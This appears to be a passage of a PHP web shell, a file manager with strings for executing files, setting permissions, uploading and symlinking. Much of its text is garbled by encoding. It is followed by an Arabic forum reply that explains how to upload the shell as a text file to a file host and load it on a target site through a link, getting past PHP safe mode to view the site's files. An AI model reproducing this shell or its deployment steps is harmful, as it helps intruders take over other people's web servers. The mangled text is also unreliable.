'created' => 'Soubor "***91;%1***93;" byl vytvo***1573;\99en.',
'not_created' => 'Soubor "***91;%1***93;" nemohl b***1571;***189;t vytvo***1573;\99en.',
'really_delete' => 'Vymazat soubor?',
'deleted' => "Byly vymaz***1571;***1548;ny tyto soubory:\n***91;%1***93;",
'not_deleted' => "Tyto soubory nemohly b***1571;***189;t vytvo***1573;\99eny:\n***91;%1***93;",
'rename_file' => 'P***1573;\99ejmenuj soubory:',
'renamed' => 'Soubor "***91;%1***93;" byl p***1573;\99ejmenov***1571;***1548;n na "***91;%2***93;".',
'not_renamed' => 'Soubor "***91;%1***93;" nemohl b***1571;***189;t p***1573;\99ejmenov***1571;***1548;n na "***91;%2***93;".',
'move_files' => 'P***1573;\99em***1571;\ADstit tyto soubory:',
'moved' => "Tyto soubory byly p***1573;\99em***1571;\ADst***1572;\9Bny do \"***91;%2***93;\":\n***91;%1***93;",
'not_moved' => "Tyto soubory nemohly b***1571;***189;t p***1573;\99em***1571;\ADst***1572;\9Bny do \"***91;%2***93;\":\n***91;%1***93;",
'copy_files' => 'Zkop***1571;\ADrovat tyto soubory:',
'copied' => "Tyto soubory byly zkop***1571;\ADrov***1571;***1548;ny do \"***91;%2***93;\":\n***91;%1***93;",
'not_copied' => "Tyto soubory nemohly b***1571;***189;t zkop***1571;\ADrov***1571;***1548;ny do \"***91;%2***93;\":\n***91;%1***93;",
'not_edited' => 'Soubor "***91;%1***93;" nemohl b***1571;***189;t otev***1573;\99en.',
'executed' => "SOubor \"***91;%1***93;\" byl spu***1573;***1548;t***1572;\9Bn :\n{%2}",
'not_executed' => "Soubor \"***91;%1***93;\" nemohl b***1571;***189;t spu***1573;***1548;t***1572;\9Bn:\n{%2}",
'saved' => 'Soubor "***91;%1***93;" byl ulo***1573;***190;en.',
'not_saved' => 'Soubor "***91;%1***93;" nemohl b***1571;***189;t ulo***1573;***190;en.',
'symlinked' => 'Byl vyvo***1573;\99en symbolick***1571;***189; odkaz "***91;%2***93;" na soubor "***91;%1***93;".',
'not_symlinked' => 'Symbolick***1571;***189; odkaz "***91;%2***93;" na soubor "***91;%1***93;" nemohl b***1571;***189;t vytvo***1573;\99en.',
'permission_for' => 'Pr***1571;***1548;va k "***91;%1***93;":',
'permission_set' => 'Pr***1571;***1548;va k "***91;%1***93;" byla zm***1572;\9Bn***1572;\9Bna na ***91;%2***93;.',
'permission_not_set' => 'Pr***1571;***1548;va k "***91;%1***93;" nemohla b***1571;***189;t zm***1572;\9Bn***1572;\9Bna na ***91;%2***93;.',
'not_readable' => 'Soubor "***91;%1***93;" nen***1571;\AD mo***1573;***190;no p***1573;\99e***1572;***1670;***1571;\ADst.'
case 'en':
$date_format = 'n/j/y H:i:s';
$word_charset = 'ISO-8859-1';
return array(
'directory' => 'Directory',
'file' => 'File',
'filename' => 'Filename',
'size' => 'Size',
'permission' => 'Permission',
'owner' => 'Owner',
'group' => 'Group',
'other' => 'Others',
'functions' => 'Functions',
'read' => 'read',
'write' => 'write',
'execute' => 'execute',
'create_symlink' => 'create symlink',
'delete' => 'delete',
'rename' => 'rename',
'move' => 'move',
'copy' => 'copy',
'edit' => 'edit',
'download' => 'download',
'upload' => 'upload',
'create' => 'create',
'change' => 'change',
'save' => 'save',
'set' => 'set',
'reset' => 'reset',
'relative' => 'Relative path to target',
'yes' => 'Yes',
'no' => 'No',
'back' => 'back',
'destination' => 'Destination',
'symlink' => 'Symlink',
'no_output' => 'no output',
'user' => 'User',
'password' => 'Password',
'add' => 'add',
'add_basic_auth' => 'add basic-authentification',
'uploaded' => '"***91;%1***93;" has been uploaded.',
'not_uploaded' => '"***91;%1***93;" could not be uploaded.',
'already_exists' => '"***91;%1***93;" already exists.',
'created' => '"***91;%1***93;" has been created.',
'not_created' => '"***91;%1***93;" could not be created.',
'really_delete' => 'Delete these files?',
'deleted' => "These files have been deleted:\n***91;%1***93;",
'not_deleted' => "These files could not be deleted:\n***91;%1***93;",
'rename_file' => 'Rename file:',
'renamed' => '"***91;%1***93;" has been renamed to "***91;%2***93;".',
'not_renamed' => '"***91;%1***93; could not be renamed to "***91;%2***93;".',
'move_files' => 'Move these files:',
'moved' => "These files have been moved to \"***91;%2***93;\":\n***91;%1***93;",
'not_moved' => "These files could not be moved to \"***91;%2***93;\":\n***91;%1***93;",
'copy_files' => 'Copy these files:',
'copied' => "These files have been copied to \"***91;%2***93;\":\n***91;%1***93;",
'not_copied' => "These files could not be copied to \"***91;%2***93;\":\n***91;%1***93;",
'not_edited' => '"***91;%1***93;" can not be edited.',
'executed' => "\"***91;%1***93;\" has been executed successfully:\n{%2}",
'not_executed' => "\"***91;%1***93;\" could not be executed successfully:\n{%2}",
'saved' => '"***91;%1***93;" has been saved.',
'not_saved' => '"***91;%1***93;" could not be saved.',
'symlinked' => 'Symlink from "***91;%2***93;" to "***91;%1***93;" has been created.',
'not_symlinked' => 'Symlink from "***91;%2***93;" to "***91;%1***93;" could not be created.',
'permission_for' => 'Permission of "***91;%1***93;":',
'permission_set' => 'Permission of "***91;%1***93;" was set to ***91;%2***93;.',
'permission_not_set' => 'Permission of "***91;%1***93;" could not be set to ***91;%2***93;.',
'not_readable' => '"***91;%1***93;" can not be read.'
function getimage ($image) {
switch ($image) {
case 'file':
return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
case 'folder':
return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
case 'hidden_file':
return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
case 'link':
case 'smiley':
return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
case 'arrow':
return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
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قم بنسخ هذا الشل وضعه في المفكره ثم بعد ذلك أحفظه بإمتداد txt
ثم إذهب لأي مركز رفع وأرفع هذا الشل.
وبعد رفعك للملف سوف يظهر لك رابط الملف مثال :
هذا مثال سوف يظهر لك رابط الشل هكذا بعد ماتقوم برفعه على مركز الرفع.
قم بنسخ الرابط وضعه او إستبدله بمكان الرابط الذي وضعته أنت وسوف يظهر الشل أمامك .. والشل الذي ظهر لك سابقآ لا يعمل بسبب السيف مود فعال على ما أعتقد ولكن بعد ماتضع الشل الذي وضعته لك سوف يتم التخطي بإذن الله وسوف ترى ملفات الموقع.
موفق أخي الكريم وأتمنى عدم إستخدام طرق الإختراق والتخطي في الإخوان المسلمين وانا بريء من ذلك